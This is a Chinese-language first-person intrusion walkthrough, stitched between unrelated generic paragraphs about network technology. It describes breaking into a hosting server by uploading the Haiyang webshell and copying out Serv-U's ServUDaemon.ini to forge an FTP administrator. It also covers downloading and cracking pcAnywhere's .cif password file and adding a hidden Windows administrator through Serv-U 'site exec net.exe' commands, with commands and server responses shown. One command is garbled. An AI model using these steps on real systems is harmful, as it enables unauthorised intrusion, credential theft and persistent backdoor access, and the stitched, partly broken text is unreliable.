|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 最近的一次滲透半夜2點多了,在和QQ上一個好友聊天,也不知道怎么的叫我測試他的空間商的服務器是不是安全,二話不說先發個 海陽木馬上去 1,初戰告捷 打開IE 輸入 http://domain.com/mail.asp (mail.asp是我給木馬改的名字),習慣的先輸入密碼,和我想的一樣,服務器禁止了FSO!沒辦法退回來,看看能不能瀏覽目錄,c:\ 發送命令 ,good~~ 居然可以 C:\Documents and Settings-----0 C:\Inetpub-----0 C:\Program Files-----0 C:\WINNT-----0 C:\Inetpub 沒刪 看看scripts映射有沒有刪掉,http://ip/scripts,返回404,刪掉了管理員還不錯,但沒有取消分區的everyone的所有權限讓他的服務器受到致命的打擊! 在ie 輸入 ftp://ip 返回 serv-u 什么不能匿名登陸,不過這個已經夠了,確認了他的ftp服務器段用的什么軟件,找吧,一般serv-u會裝在C:\Program Files ,C:\Program Files 發送命令 ,沒有:(,d:\ 發送命令 看到D:\Program Files,肯定就在里面我心里想,果然看到了D:\Program Files\Serv-u,謝天謝地!接下來我需要獲得ServUDaemon.ini這個文件,海陽木馬提供了copy 功能 D:\Program Files\Serv-u\ServUDaemon.ini copy E:\www\我的朋友的目錄\ 發送命令 Great ~~ 顯示 command completed success 成功 在ie 輸入 http://domain.com/ServUDaemon.ini 把ServUDaemon.ini down下來了 接著把ServUDaemon.ini 拷貝到 本地機的serv-u里,(我的電腦上安裝了serv-u,你如果沒有安裝一個,在肉雞上下載文件也很方便),打開 serviadmin ,你就會看到 肉雞上的ftp用戶了,不過 這些用戶的口令是加密!不管他我們要獲得是管理員,添加一個用戶,把他添加成管理員,保存!把這個新的ServUDaemon.ini 發給我朋友,叫他用ftp上傳,覆蓋掉原來web目錄里的 ok~~接下來沒他的事了。。海 D:\Program Files\Serv-u\ServUDaemon.ini move E:\www\我的朋友的目錄\bbs command completed success (注意:這里一定要先移除掉 ServUDaemon.ini 海陽木馬不會自動覆蓋) D:\Program Files\Serv-u\ 看看ServUDaemon.ini 是不是移除了,確實沒有了 E:\www\我的朋友的目錄\ServUDaemon.ini copy D:\Program Files\Serv-u\ command completed success 到這里只要服務器重起,我們就獲得了ftp的管理員權限,可以通過本地機的servu 遠程連接 肉雞上的 servu !滲透基本成功 2,意外的發現 弄了半天,我還沒掃描過他的服務器,不要弄出什么弱口令什么的,前面做的可真是笑話。海 當然掃描結果沒有這些,卻意外的發現了5631 5632 端口,呵呵~~直到是什么的嗎?pcanywhere的,去吧pcanywhere的密碼文件down 下來,用流光看密碼^o^ ,一般pcanywhere的密碼文件都是放在 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 目錄,PCA.*****.cif 這個文件就是了 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.23212.cif copy E:\www\我的朋友的目錄\ http://domain.com/PCA.23212.cif 用流光讀取了密碼,順利的連上了肉雞,當然肉雞是鎖定的,不然可以直接裝后門了! 但最大的收獲,pcanywhere可以重起服務器,哈哈哈!我現在是ftp的管理員了 遠程連上肉雞的servu,創建了一個naxin的用戶,添加了 主目錄 指向d:\www 并添加c d e f 分區的映射,全部權限!現在我控制著服務器的生殺大權,雖然不是系統管理員,但可以通過ftp刪除文件,嘎嘎嘎~~ 然而我發現ftp只能用port模式連接,在后面的滲透埋下了陰影 3,最后的勝利 入侵者有著強烈的控制欲,我當然不會甘心只得到ftp的管理員,我要的是系統管理員! 用過serv-u的應該看到有個執行權限吧!嗬嗬用它就可以來添加管理員,具體命令 shell>ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v4.0 for WinSock ready... User (ip:(none)): id 331 User name okay, please send complete E-mail address as password. Password:password 230 User logged in, proceed. ftp> cd winnt 250 Directory changed to /WINNT ftp>cd system32 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user cnaxin$ 123 /add 200 EXEC command successful (TID=33). ftp>quote site exec net.exe localhost administrators cnaxin$ /add 哈哈哈!完成了!! 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!